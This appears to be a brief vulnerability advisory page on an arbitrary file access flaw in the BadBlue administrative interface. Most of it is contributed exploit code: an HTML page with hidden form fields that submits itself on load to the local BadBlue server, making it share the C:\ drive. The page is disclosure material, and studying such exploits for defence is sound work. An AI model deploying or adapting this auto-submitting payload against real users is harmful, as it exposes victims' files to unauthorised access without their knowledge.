|
|
Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability
The following exploit code was contributed by Matthew Murphy <mattmurphy@kc.rr.com>: <HTML> <HEAD> <FORM ACTION=http://localhost/ext.dll METHOD=GET> <INPUT TYPE=hidden NAME=MfcISAPICommand VALUE=LoadPage> <INPUT TYPE=hidden NAME=page VALUE=dir.hts> <INPUT TYPE=hidden NAME=a0 VALUE=add> <INPUT TYPE=hidden NAME=a2 VALUE=hd> <INPUT TYPE=hidden NAME=a1 VALUE=C:\> </FORM> </HEAD> <BODY ONLOAD="document.forms(0).submit()" /> </HTML> |
|
Privacy Statement |